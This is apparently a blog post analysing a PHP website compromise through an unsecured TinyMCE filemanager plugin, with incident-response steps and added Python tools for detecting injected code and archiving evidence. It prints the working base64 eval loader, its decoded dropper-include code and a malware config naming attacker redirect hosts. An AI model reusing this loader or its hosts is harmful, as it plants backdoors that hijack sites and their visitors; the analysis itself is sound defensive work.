Website hack through the TinyMCE filemanager plugin
A few days ago we realized that one of our client's websites was not working at all. After a short while we found that the site had probably been hacked.
The server belongs to a client and is used mainly to run older, unmaintained projects. Among them was an old Mambo CMS installation which, apart from other plug-ins, had the TinyMCE WYSIWYG editor installed.
The website we found not working had something strange included at the top of each PHP file:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWJzaXRlcy9zaXRlcy9hYnNpdGUuY29tL2h0bWwvY3AvY3BhaW50L21hbWJvdHMvZWRpdG9ycy9tb3NjZS9qc2NyaXB0cy90aW55X21jZS9wbHVnaW5zL2ZpbGVtYW5hZ2VyL0luc2VydEZpbGUvZG9jcy9lbi9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
Decoding the base64 string gives a short PHP snippet: it includes a file, checks that two functions defined in that file exist and, if they do, registers one of them as an output-buffer callback. Here is the decoded code:
if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
    $GLOBALS['mfsn']='/websites/sites/absite.com/html/cp/cpaint/mambots/editors/mosce/jscripts/tiny_mce/plugins/filemanager/InsertFile/docs/en/images/style.css.php';
    if(file_exists($GLOBALS['mfsn'])){
        include_once($GLOBALS['mfsn']);
        if(function_exists('gml') && function_exists('dgobh')){
            ob_start('dgobh');
        }
    }
}
As you can see, the included file sits inside the filemanager plug-in of the TinyMCE editor, hidden under a docs/images directory with a .css.php name. Many people do not realise that file manager and image manager plug-ins ship with no access control of their own; it is up to the developer who installs them to add authentication and to restrict what can be uploaded and where. Unless that is done, the plug-in is a direct write hole into the web root: whatever is uploaded through it, PHP files included, is then executed by the web server. The ob_start('dgobh') call is what makes the infection useful to the attacker: every page generated by an infected script passes through dgobh() before it is sent, so the response can be rewritten at will (the hidden <font id="wyfp"> block in the config below looks like the kind of content that gets inserted).
From the analysis it seems that the data used by the intruder is stored in files in the same folder as the main script. Apart from a 10k-word dictionary there is also an SWF movie, and I found a config file which, after decoding, looks like this (several key names are still base64: ZGd0 is dgt, cHJs is prl, ZnJi is frb, a3dy is kwr, and so on):
dgqn = “nkht”
dgurl= http://umniktds.ws/in.cgi?24&parameter=$keyword&se=$se&seoref=%ref%&HTTP_REFERER=%self_url%&default_keyword=%kw%
dgsu = http://umniktds.ws/in.cgi?7&parameter=%kw%&HTTP_REFERER=%self_url%
dguh = http://nomsat24.net/;http://nssat4.com/;http://wplsat24.net/
dgid = 65fcd851-e2f2-a45c-e389-04e0daf71df6
ZGd0 = 2
cHJs = 1
st = <style>#wyfp {position:absolute;overflow:auto;height:0;width:0;}</style><font id=”wyfp”>
ed = </font>
lbp = 2
dgblo = 1
ZnJi = 0
dgsr = 1
dgst = 24
fr = 0
a3dy = 1
dgtheme = “google_trends”
Z2M= = “”
Z2Q= = 30
bWw= = 50
c2Rs = 1
Z3o= = 0
Among the stored data there is also an IP address in a file of its own, 59.97.104.17|1274687317. The address translates to the Indian mobile operator Bharat Sanchar Nigam Limited, and the number after the pipe looks like a Unix timestamp (1274687317 is 24 May 2010, 07:48 UTC, three days before the main scripts were last modified).
There is also a file with a list of about 1000 IP address ranges.
I decoded the main script, which is base64-encoded recursively and split into many blocks; it took me a while to write a parser for it. The source is also minified: all whitespace is stripped and every variable and function name is a random string, so it is hard to read even after restoring some formatting. You can have a look, the source is attached. From what I can see, the script makes HTTP requests or other socket connections and behaves differently for search engine robots than for ordinary visitors. According to this report, the script is suspected of installing viruses.
This thing seems to be clever enough to clean up after itself: the entire working directory of the main hack script was cleared out. Don't worry, we have a copy; you can download it from the attachment if you are interested.
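As an added example (my own code, not the post's and not the malware's), here is a small Python tool that does what the two decoding steps above describe: it recognises the eval(base64_decode(...)) prefix on top of a PHP file, decodes it, pulls out the included path and the ob_start() callback name, strips the prefix from the file, and keeps decoding while the result is itself another eval(base64_decode(...)) wrapper, which is the recursive encoding the main script used. SAMPLE_STUB is the exact string quoted at the top of the post; NESTED_SAMPLE is constructed here for the demo, and the 4096-byte read limit in the directory scanner is my own choice.

```python
import base64
import os
import re

# The prefix found on top of every infected PHP file, copied verbatim from the post.
SAMPLE_STUB = (
    "<?php /**/eval(base64_decode('"
    "aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRH"
    "TE9CQUxTWydtZnNuJ109Jy93ZWJzaXRlcy9zaXRlcy9hYnNpdGUuY29tL2h0bWwvY3AvY3BhaW50L21h"
    "bWJvdHMvZWRpdG9ycy9tb3NjZS9qc2NyaXB0cy90aW55X21jZS9wbHVnaW5zL2ZpbGVtYW5hZ2VyL0lu"
    "c2VydEZpbGUvZG9jcy9lbi9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JB"
    "TFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlz"
    "dHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ=="
    "')); ?>"
)

# eval(base64_decode('...')) with either quote style and optional whitespace.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# The whole injected prefix: <?php /**/eval(base64_decode('...')); ?>
STUB_RE = re.compile(
    r"<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]"
    r"\s*\)\s*\)\s*;?\s*\?>\s*")
# $GLOBALS['name']='value' and ob_start('callback') inside the decoded layer.
PATH_RE = re.compile(r"\$GLOBALS\[['\"](\w+)['\"]\]\s*=\s*['\"]([^'\"]+)['\"]")
OB_RE = re.compile(r"ob_start\s*\(\s*['\"](\w+)['\"]\s*\)")


def unwrap_layers(payload_b64, max_depth=16):
    """Decode base64 repeatedly while each result is again eval(base64_decode('...')).
    Returns the decoded layers, outermost first; max_depth guards against loops."""
    layers = []
    current = payload_b64
    for _ in range(max_depth):
        raw = base64.b64decode(re.sub(r"\s+", "", current), validate=True)
        decoded = raw.decode("utf-8", "replace")
        layers.append(decoded)
        inner = EVAL_B64_RE.search(decoded)
        if not inner:
            break
        current = inner.group(1)
    return layers


def analyse_stub(php_source):
    """Return details of the injected prefix, or None if the source is clean."""
    m = STUB_RE.search(php_source)
    if not m:
        return None
    layers = unwrap_layers(m.group(1))
    innermost = layers[-1]
    assignments = PATH_RE.findall(innermost)
    callback = OB_RE.search(innermost)
    return {
        "layers": len(layers),
        "global_name": assignments[0][0] if assignments else None,
        "included_file": assignments[0][1] if assignments else None,
        "ob_callback": callback.group(1) if callback else None,
        "decoded": innermost,
    }


def strip_stub(php_source):
    """Remove every copy of the prefix; returns (cleaned_source, copies_removed)."""
    return STUB_RE.subn("", php_source)


def scan_tree(root):
    """Yield (path, details) for each .php file under root that carries the prefix.
    Only the first 4096 bytes are read, since the prefix sits at the very top."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            info = analyse_stub(head)
            if info:
                yield path, info


def wrap(php_code):
    """Build one eval(base64_decode('...')); layer around php_code (demo helper)."""
    return "eval(base64_decode('%s'));" % base64.b64encode(php_code.encode()).decode()


# Constructed two-layer sample, mimicking the recursive encoding of the main script.
NESTED_SAMPLE = "<?php /**/" + wrap(wrap("echo 'inner';")) + " ?>"


if __name__ == "__main__":
    import sys
    for sample in (SAMPLE_STUB, NESTED_SAMPLE):
        print(analyse_stub(sample))
    for found, details in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(found, details["included_file"], details["ob_callback"])
```

Running it against the quoted stub reports one layer, the global name mfsn, the style.css.php path shown above and the callback dgobh; a clean file returns None. Do not run strip_stub() over a tree until a copy has been archived, and remember that removing the prefix does nothing about the dropper file it includes.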
Some statistical data
we found more than 10 000 PHP files on this server injected with the malicious code
all injected files were modified on 21 April 2010; the main hack scripts were modified on 27 May 2010
the main script is about 3500 lines long after restoring some formatting
Attackers' zipped source folder
Decoded and partly formatted source code of the PHP attack script
This is the suspected file:
/websites/sites/absite.com/html/cp/cpaint/mambots/editors/mosce/jscripts/tiny_mce/plugins/filemanager/InsertFile/docs/en/images/style.css.php
Possibly copied over through the unsecured image manager.
During our steps to make the timesheet of holden jones work, this script together with
the other files in the folder disappeared.
I have a zipped copy of the entire pascoe Mambo CMS in its original state,
including the removed files.
So this thing seems to be clever enough to clean up after itself, so
let's verify whether they haven't created a backdoor somewhere.
For reference, this is what I have done on the server, in chronological order:
1. found that the holdenjohns timesheet application has got some strange
inclusions in its PHP scripts:
<?php
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWJzaXRlcy9zaXRlcy9hYnNpdGUuY29tL2h0bWwvY3AvY3BhaW50L21hbWJvdHMvZWRpdG9ycy9tb3NjZS9qc2NyaXB0cy90aW55X21jZS9wbHVnaW5zL2ZpbGVtYW5hZ2VyL0luc2VydEZpbGUvZG9jcy9lbi9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ=='));
?>
, followed these up and ended up on the script mentioned above. That script
has got all the malicious code in it; I'll analyse later whether it was
loading anything else on the server.
2. I created a tar.gz of the holden_johnes directory and copied it to the
/home/stan/attack-28052010 folder
3. I created a tar.gz of the folder /websites/site/pascoeinternational.com
and copied it to the /home/stan/attack-28052010 folder
4. removed the holden-johnes files (I couldn't delete some cache in the compiled
directory as I didn't have permissions to do so)
5. Martin copied over his local copy. There was one file having the
malicious code included in his local copy also, which was dated 9/4/2010;
this is the oldest file we know of so far that was modified by this.
The HJ application started to work
6. I renamed /websites/sites/pascoeinternational.com to
/websites/sites/pascoeinternational.com.rem as I cannot delete the files.
7. I renamed all other folders in /home/stan/sites/absite.com/html/cp/
with the suffix ".hack", apart from timesheets_hj which is needed by the client
and had been cleaned up.
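The seven steps above archive two directories before anything is cleaned up. As an added example, and not the author's procedure, the following Python script shows what I would capture before renaming or deleting anything on a compromised web root: a manifest with size, mtime, ctime and SHA-256 of every file, the subset modified inside the suspect window (the post's 21 April to 27 May 2010), the oldest such file (the post found one dated 9/4/2010 that way), and a tar.gz that keeps ownership, mode and timestamps. The root path, output directory and date window are parameters; nothing here refers to the real server. One caveat a responder should keep in mind: mtime is trivially forged with touch, while ctime is set by the kernel on every metadata change and cannot be backdated from userland without moving the system clock, so the manifest records both.

```python
import hashlib
import os
import tarfile
from datetime import datetime, timezone


def sha256_file(path, chunk=1 << 16):
    """Hex SHA-256 of a file, read in chunks so large uploads stay out of memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """One record per regular file under root, sorted by relative path.
    Both mtime (forgeable with touch) and ctime (kernel-set) are recorded as UTC."""
    records = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):
                continue
            st = os.stat(path)
            records.append({
                "path": os.path.relpath(path, root),
                "size": st.st_size,
                "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc),
                "ctime": datetime.fromtimestamp(st.st_ctime, timezone.utc),
                "sha256": sha256_file(path),
            })
    records.sort(key=lambda r: r["path"])
    return records


def modified_between(records, start, end):
    """Records whose mtime falls in [start, end]; bounds are aware UTC datetimes."""
    return [r for r in records if start <= r["mtime"] <= end]


def earliest(records):
    """The record with the oldest mtime, or None for an empty manifest."""
    return min(records, key=lambda r: r["mtime"]) if records else None


def write_manifest(records, out_path):
    """Tab-separated manifest; returns its own SHA-256 so the evidence file
    can be verified later."""
    with open(out_path, "w", encoding="utf-8") as fh:
        fh.write("sha256\tsize\tmtime_utc\tctime_utc\tpath\n")
        for r in records:
            fh.write("%s\t%d\t%s\t%s\t%s\n" % (
                r["sha256"], r["size"], r["mtime"].isoformat(),
                r["ctime"].isoformat(), r["path"]))
    return sha256_file(out_path)


def archive_tree(root, out_path):
    """tar.gz of the whole tree. tarfile keeps mode, uid/gid and mtime, which a
    plain copy would not; take this before renaming or deleting anything."""
    with tarfile.open(out_path, "w:gz") as tf:
        tf.add(root, arcname=os.path.basename(os.path.normpath(root)))
    return out_path


if __name__ == "__main__":
    import sys
    root, out_dir = sys.argv[1], sys.argv[2]   # e.g. /websites/sites/example /home/stan/evidence
    os.makedirs(out_dir, exist_ok=True)
    manifest = build_manifest(root)
    # Suspect window taken from the post's statistics; adjust to the case at hand.
    window = modified_between(
        manifest,
        datetime(2010, 4, 21, tzinfo=timezone.utc),
        datetime(2010, 5, 28, tzinfo=timezone.utc))
    print("%d files, %d modified in window" % (len(manifest), len(window)))
    oldest = earliest(window)
    if oldest:
        print("oldest in window:", oldest["path"], oldest["mtime"].isoformat())
    print("manifest sha256:", write_manifest(manifest, os.path.join(out_dir, "manifest.tsv")))
    print("archive:", archive_tree(root, os.path.join(out_dir, "site.tar.gz")))
```

Run it as the user that owns the web root (step 4 above shows what happens when permissions are missing), keep the manifest and the archive on a different filesystem from the compromised tree, and record the manifest hash somewhere the attacker cannot reach before going back to clean up.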
Published by Stan Kuhn in: Security and anti-spam
